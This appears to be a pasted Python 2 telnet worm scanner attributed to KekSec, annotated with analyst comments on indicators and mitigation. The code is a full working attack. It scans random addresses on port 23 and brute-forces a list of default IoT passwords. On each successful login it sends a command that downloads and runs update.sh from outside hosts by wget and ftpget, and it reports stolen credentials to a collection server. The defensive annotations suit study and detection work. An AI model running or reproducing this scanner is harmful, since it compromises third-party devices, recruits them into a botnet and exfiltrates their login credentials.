KekSec

TELNET SCANNER

Jul 7th, 2020
  1. #!/usr/bin/python
  2. import threading, sys, os, re, time, random, socket, select, itertools
  3.  
  # Analyst note: Python 2 source (print statement, xrange, raw_input). The
  # paste rendering shows listing numbers and no indentation.
  # Argument check: the script expects a thread count and an output file path
  # and exits after printing usage when fewer than two arguments are given.
  4. if len(sys.argv) < 3:
  5. print "Usage: python "+sys.argv[0]+" <threads> <output file>"
  6. sys.exit()
  7.  
  # Analyst note: hard-coded "username:password" pairs. router() splits each
  # entry on ":" and tries the pairs in list order against every telnet
  # service it reaches. An empty right-hand side (e.g. "root:") is a blank
  # password. Some pairs are repeated ("admin:1234", "guest:12345").
  # The entries look like vendor/factory defaults; several of them
  # (root:xc3511, root:vizxv, root:juantech, root:7ujMko0vizxv, ...) also
  # appear in the credential table of the published Mirai source.
  # Defensive use: any device that still accepts one of these pairs on an
  # exposed telnet port should be treated as compromised or about to be;
  # a telnet session that walks this list in order is a usable brute-force
  # signature for honeypots and IDS rules.
  8. combo = [
  9. "root:root",
  10. "root:",
  11. "admin:admin",
  12. "support:support",
  13. "user:user",
  14. "admin:",
  15. "admin:password",
  16. "root:vizxv",
  17. "root:admin",
  18. "root:xc3511",
  19. "root:888888",
  20. "root:xmhdipc",
  21. "root:default",
  22. "root:juantech",
  23. "root:123456",
  24. "root:54321",
  25. "root:12345",
  26. "root:pass",
  27. "ubnt:ubnt",
  28. "root:klv1234",
  29. "root:Zte521",
  30. "root:hi3518",
  31. "root:jvbzd",
  32. "root:anko",
  33. "root:zlxx.",
  34. "root:7ujMko0vizxv",
  35. "root:7ujMko0admin",
  36. "root:system",
  37. "root:ikwb",
  38. "root:dreambox",
  39. "root:user",
  40. "root:realtek",
  41. "root:00000000",
  42. "admin:1111111",
  43. "admin:1234",
  44. "admin:12345",
  45. "admin:54321",
  46. "admin:123456",
  47. "admin:7ujMko0admin",
  48. "admin:1234",
  49. "admin:pass",
  50. "admin:meinsm",
  51. "admin:admin1234",
  52. "root:1111",
  53. "admin:smcadmin",
  54. "admin:1111",
  55. "root:666666",
  56. "root:password",
  57. "root:1234",
  58. "root:klv123",
  59. "Administrator:admin",
  60. "service:service",
  61. "supervisor:supervisor",
  62. "guest:guest",
  63. "guest:12345",
  64. "guest:12345",
  65. "admin1:password",
  66. "administrator:1234",
  67. "666666:666666",
  68. "888888:888888",
  69. "tech:tech"
  70. ]
  71.  
  # Runtime parameters taken straight from the command line: the number of
  # worker threads to start and the file that receives one line per device
  # whose login succeeded (see the fh.write call in router()).
  72. threads = int(sys.argv[1])
  73. output_file = sys.argv[2]
  74.  
  # readUntil(tn, string, timeout=8): accumulate data from socket `tn` in
  # 1024-byte reads, pausing 0.1 s after each read, until `string` appears in
  # the accumulated buffer, then return the buffer. If the wall-clock timeout
  # elapses first it raises Exception('TIMEOUT!').
  # router() calls this with ":" as the marker, so any banner containing a
  # colon is treated as a login or password prompt. For defenders this means
  # a telnet honeypot only needs to present a "login:"-style prompt to
  # collect the credential attempts.
  # NOTE(review): the caller sets a 1 s socket timeout before calling, so
  # recv() itself can presumably raise before the 8 s budget is used up.
  75. def readUntil(tn, string, timeout=8):
  76. buf = ''
  77. start_time = time.time()
  78. while time.time() - start_time < timeout:
  79. buf += tn.recv(1024)
  80. time.sleep(0.1)
  81. if string in buf: return buf
  82. raise Exception('TIMEOUT!')
  83.  
  # recvTimeout(sock, size, timeout=8): switch the socket to non-blocking
  # mode, wait up to `timeout` seconds with select() for it to become
  # readable, and return a single recv(size) result. Returns "" when nothing
  # arrives in time. router() uses it to capture whatever the device prints
  # after the password has been sent.
  84. def recvTimeout(sock, size, timeout=8):
  85. sock.setblocking(0)
  86. ready = select.select([sock], [], [], timeout)
  87. if ready[0]:
  88. data = sock.recv(size)
  89. return data
  90. return ""
  91.  
  92.  
  # router(ip, port): credential brute force plus payload delivery against a
  # single telnet service. For every entry in `combo` it opens a fresh TCP
  # connection, waits for two ":" prompts, sends the username and then the
  # password, and treats "#", "$" or ">" in the reply as a shell prompt.
  #
  # Indicators of compromise visible in this function:
  #   - HTTP download of update.sh from 185.10.68.175
  #   - anonymous FTP download of update.sh from 196.53.114.199, port 21
  #   - raw TCP report of "ip:port user:pass" to 185.10.68.175 port 8080
  #   - a file named update.sh created in /tmp, /var/run, /mnt, /root or /
  #
  # Detection: on the device, a telnet login followed at once by wget or
  # ftpget, chmod 777 and execution of a script from a temp directory;
  # on the network, egress from IoT/embedded segments to the hosts above.
  # Mitigation: disable telnet or keep it off untrusted networks, replace
  # factory credentials, and restrict outbound traffic from device VLANs.
  93. def router(ip, port):
  94. ip = str(ip).rstrip('\n')
  # Command line sent to the device after a successful login. It changes
  # into the first directory that works, fetches update.sh four ways (wget,
  # busybox wget, ftpget, busybox ftpget), marks it executable, runs it and
  # deletes it. The contents of update.sh are not part of this page.
  95. rekdevice="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.175/update.sh -O update.sh; busybox wget http://185.10.68.175/update.sh -O update.sh; ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; chmod 777 update.sh; ./update.sh; rm -rf update.sh"
  96. global fh
  97. username = ""
  98. password = ""
  99. for passwd in combo:
  # The "n/a" markers are checked here, but no entry in combo uses them.
  100. if ":n/a" in passwd:
  101. password=""
  102. else:
  103. password=passwd.split(":")[1]
  104. if "n/a:" in passwd:
  105. username=""
  106. else:
  107. username=passwd.split(":")[0]
  # One new TCP connection per credential pair, 1 s connect timeout. A
  # failed connect abandons the host entirely (break, not continue).
  108. try:
  109. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  110. tn.settimeout(1)
  111. tn.connect((ip,port))
  112. except Exception:
  113. break
  114. try:
  115. hoho = ''
  116. hoho += readUntil(tn, ":")
  117. if ":" in hoho:
  118. tn.send(username + "\r\n")
  119. time.sleep(0.1)
  120. hoho = ''
  121. hoho += readUntil(tn, ":")
  122. if ":" in hoho:
  123. tn.send(password + "\r\n")
  124. time.sleep(0.1)
  125. prompt = ''
  126. prompt += recvTimeout(tn, 40960)
  # Success heuristic: any of "#", "$", ">" anywhere in the reply.
  127. if "#" in prompt or "$" in prompt or ">" in prompt:
  128. success = True
  129. else:
  130. tn.close()
  131. continue
  132. if success == True:
  133. try:
  134. tn.send(rekdevice + "\r\n")
  # Local log line, format "ip:23 user:pass". The author's trailing
  # comment tags this format "//mirai".
  135. fh.write(ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai
  136. fh.flush()
  # The same tuple is reported in cleartext to a collection host, so the
  # working credentials of each victim are visible in a packet capture.
  137. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  138. s.connect(("185.10.68.175", 8080))
  139. s.send(ip + ":" + str(port) + " " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai
  140. s.close()
  141. print "[+] GOTCHA -> %s:%s:%s"%(username, password, ip)
  142. tn.close()
  143. break
  144. except:
  145. tn.close()
  146. else:
  147. tn.close()
  # Every error in the login exchange is swallowed and the loop moves on to
  # the next credential pair.
  148. except Exception:
  149. pass
  150.  
  151.  
  # gen_IP(): build a random dotted-quad IPv4 address. The first octet is
  # drawn from 1-255 and redrawn while it is one of 10, 127, 169, 172, 192,
  # 185, 233 or 234; the other three octets are drawn from 1-255.
  # The exclusion is by whole first octet, so it skips far more than the
  # private and loopback ranges. 185 is also the first octet of the download
  # and reporting host used in router(); presumably the operator avoids
  # scanning that range on purpose.
  # Defender takeaway: target selection is uniform random, not targeted.
  # Any telnet port reachable from the Internet will be probed sooner or
  # later by scanners of this kind.
  152. def gen_IP():
  153. not_valid = [10,127,169,172,192,185,233,234]
  154. first = random.randrange(1,256)
  155. while first in not_valid:
  156. first = random.randrange(1,256)
  157. ip = ".".join([str(first),str(random.randrange(1,256)),
  158. str(random.randrange(1,256)),str(random.randrange(1,256))])
  159. return ip
  # worker(): endless loop run by each thread. It picks a random address,
  # attempts a TCP connect to port 23 with a 0.5 s timeout, closes that
  # probe connection and, if the connect succeeded, hands the address to
  # router(). All exceptions are discarded.
  # Detection: a host running this produces a sustained stream of
  # short-lived outbound connection attempts to port 23 across unrelated
  # destination addresses, which stands out in NetFlow or firewall logs.
  160. def worker():
  161. while True:
  162. IP = gen_IP()
  163. try:
  164. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  165. s.settimeout(0.5)
  166. s.connect((IP, 23))
  167. s.close()
  168. router(IP, 23)
  169. except Exception as e:
  170. pass
  171.  
  # Script entry: open the output file in append mode (shared by all threads
  # through the global fh), start `threads` worker threads, then block on
  # keyboard input. Pressing Enter ends the process by sending signal 9 to
  # its own PID. Thread start failures are silently ignored.
  # Forensics: the append-mode output file holds "ip:23 user:pass" lines for
  # every device that accepted a login, so on a seized or compromised
  # scanning host it doubles as a victim list for notification.
  172. global fh
  173. fh = open(output_file, "a")
  174. for l in xrange(threads):
  175. try:
  176. t = threading.Thread(target=worker)
  177. t.start()
  178. except:
  179. pass
  180.  
  181. print "Started " + str(threads) + " scanner threads! Press enter to stop."
  182.  
  183. raw_input()
  184. os.kill(os.getpid(), 9)